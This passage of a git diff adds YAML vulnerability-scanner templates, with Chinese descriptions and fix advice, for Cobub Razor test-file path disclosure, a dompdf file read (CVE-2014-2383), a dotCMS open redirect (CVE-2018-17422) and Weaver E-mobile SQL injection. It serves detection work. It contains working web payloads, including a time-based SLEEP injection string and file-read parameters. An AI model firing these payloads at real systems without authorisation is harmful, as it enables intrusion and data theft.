3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + raw: + - | + GET /razor/tests/generate.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml new file mode 100755 index 000000000..05b2f654f --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/Ccobubrazor_v8-getConfigTest-info.yaml @@ -0,0 +1,35 @@ +id: Ccobubrazor_v8-getConfigTest-info +info: + name: cobubrazor_v8_controllers_getConfigTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_controllers_getConfigTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://c4j.cn/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal erro') + raw: + - | + GET /razor/tests/controllers/getConfigTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml new file mode 100755 index 000000000..f2acb4ba9 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-Controller_fixt-info +info: + name: cobubrazor_v8_tests_fixtures_Controller_fixt.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_fixtures_Controller_fixt.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/fixtures/Controller_fixt.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml new file mode 100755 index 000000000..c28a7c2e2 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-Controller_fixt2-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-Controller_fixt2-info +info: + name: cobubrazor_v8_tests_fixtures_Controller_fixt2.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_fixtures_Controller_fixt2.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/fixtures/Controller_fixt2.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml new file mode 100755 index 000000000..2f228ceab --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-commonDbfix-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-commonDbfix-info +info: + name: cobubrazor_v8_tests_models_commonDbfix.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_models_commonDbfix.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/models/commonDbfix.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml new file mode 100755 index 000000000..3de0b59a8 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-getUpdateTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-getUpdateTest-info +info: + name: cobubrazor_v8_tests_controllers/getUpdateTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers/getUpdateTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/getUpdateTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml new file mode 100755 index 000000000..fd8ee831a --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-ipTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-ipTest-info +info: + name: cobubrazor_v8_tests_libs_ipTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_libs_ipTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/libs/ipTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml new file mode 100755 index 000000000..a2d4db58c --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postclientdataTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-postclientdataTest-info +info: + name: cobubrazor_v8_tests_controllers_postclientdataTest.php_信息泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers_postclientdataTest.php_信息泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/postclientdataTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml new file mode 100755 index 000000000..ec723adcf --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posterrorTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-posterrorTest-info +info: + name: cobubrazor_v8_tests_controllers_posterrorTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers_posterrorTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://c4j.cn/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/posterrorTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml new file mode 100755 index 000000000..06fb89f54 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posteventTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-posteventTest-info +info: + name: cobubrazor_v8_tests_controllers_posteventTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers_posteventTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/posteventTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml new file mode 100755 index 000000000..0f2ea5ad1 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-posttagTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-posttagTest-info +info: + name: cobubrazor_v8_tests_controllers_posttagTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers_posttagTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.cobub.com/cobub-razor/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/posttagTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml new file mode 100755 index 000000000..24121f4a1 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-postusinglogTest-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-postusinglogTest-info +info: + name: cobubrazor_v8_tests_controllers_postusinglogTest.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_controllers_postusinglogTest.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/controllers/postusinglogTest.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml new file mode 100755 index 000000000..9af673852 --- /dev/null +++ b/config/51pwn/yaml/cobubrazor/cobubrazor_v8-view_fixt2-info.yaml @@ -0,0 +1,36 @@ +id: cobubrazor_v8-view_fixt2-info +info: + name: cobubrazor_v8_tests_fixtures_view_fixt2.php_物理路径泄露 + author: + - jim2g + description: | + cobubrazor_v8_tests_fixtures_view_fixt2.php_物理路径泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: medium + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Fatal error') + - '!contains(body,''/razor/tests'')' + raw: + - | + GET /razor/tests/fixtures/view_fixt2.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml b/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml new file mode 100755 index 000000000..42f103dce --- /dev/null +++ b/config/51pwn/yaml/dompdf/CVE-2014-2383.yaml @@ -0,0 +1,41 @@ +id: CVE-2014-2383 +info: + name: Arbitrary file read in dompdf < v0.6.0 + author: + - l0ne1y + description: |- + dompdf 任意文件读取漏洞 + dompdf是一套HTML到PDF的转换工具。该工具采用样式驱动,支持下载并读取外部样式、整个样式标签和单个HTML元素的样式属性等。 + + dompdf 0.6.0:beta3及之前版本的dompdf.php文件中存在安全漏洞,当使用DOMPDF_ENABLE_PHP时,攻击者可借助PHP协议和‘input_file’参数利用该漏洞绕过改变根目录保护机制,读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/dompdf/dompdf + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: word + condition: and + part: header + words: + - application/pdf + - filename="dompdf_out.pdf" + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/dompdf.php?input_file=dompdf.php' + - '{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php' + - '{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php' + - '{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml b/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml new file mode 100755 index 000000000..ef573d04c --- /dev/null +++ b/config/51pwn/yaml/dotCMS/CVE-2018-17422.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-17422 +info: + name: dotCMS < 5.0.2 - Open Redirect + author: + - l0ne1y + description: |- + dotCMS URL重定向漏洞 + dotCMS是一套内容管理系统(CMS)。该系统支持RSS订阅、博客、论坛等模块,并具有易于扩展和构建的特点。 + + dotCMS 5.0.2之前版本中存在安全漏洞。攻击者可借助‘FORWARD_URL’参数或‘hostname’参数利用该漏洞将用户重定向到任意网站并实施钓鱼攻击。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/dotCMS/core/ + + 临时修复方案: + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: word + part: body + words: + - self.location = 'http://www.bing.com' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.bing.com' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=bing.com' + method: GET + stop-at-first-match: true diff --git a/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml b/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml new file mode 100755 index 000000000..d43533e16 --- /dev/null +++ b/config/51pwn/yaml/e-mobile/E_mobile-sqli-flowimg.yaml @@ -0,0 +1,42 @@ +id: E_mobile-sqli-flowimg +info: + name: 泛微 E-mobile flowimg.php SQL注入漏洞 + author: + - 折跃 + description: |- + 泛微 E-mobile flowimg.php SQL注入漏洞 + E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户精心打造的移动办公产品,分浏览器版和客户端版,客户端版支持主流的移动客户端,如iPhone、ipad、android、windows等。 + + 泛微 E-mobile中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + reference: + - "" + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - duration >= 5 + path: + - '{{BaseURL}}/E-mobile/flowimg.php?RUN_ID=1%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285%29%29%29LkEu%29' + method: GET + headers: + Host: '{{Hostname}}' + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml b/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml new file mode 100755 index 000000000..ca3f748a8 --- /dev/null +++ b/config/51pwn/yaml/e-mobile/wooyun-2015-0126024_2.yaml @@ -0,0 +1,40 @@ +id: wooyun-2015-0126024_2 +info: + name: 泛微E-mobile flowhave_page.php SQL注入 + author: + - 折跃 + description: |- + 泛微 E-mobile flowhave_page.php SQL注入漏洞 + E-Mobile一款由上海泛微网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户精心打造的移动办公产品,分浏览器版和客户端版,客户端版支持主流的移动客户端,如iPhone、ipad、android、windows等。 + + 泛微 E-mobile中存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,对数据库中的信息进行查看、添加、修改或删除。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.weaver.com.cn/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 + 5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。 + 6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 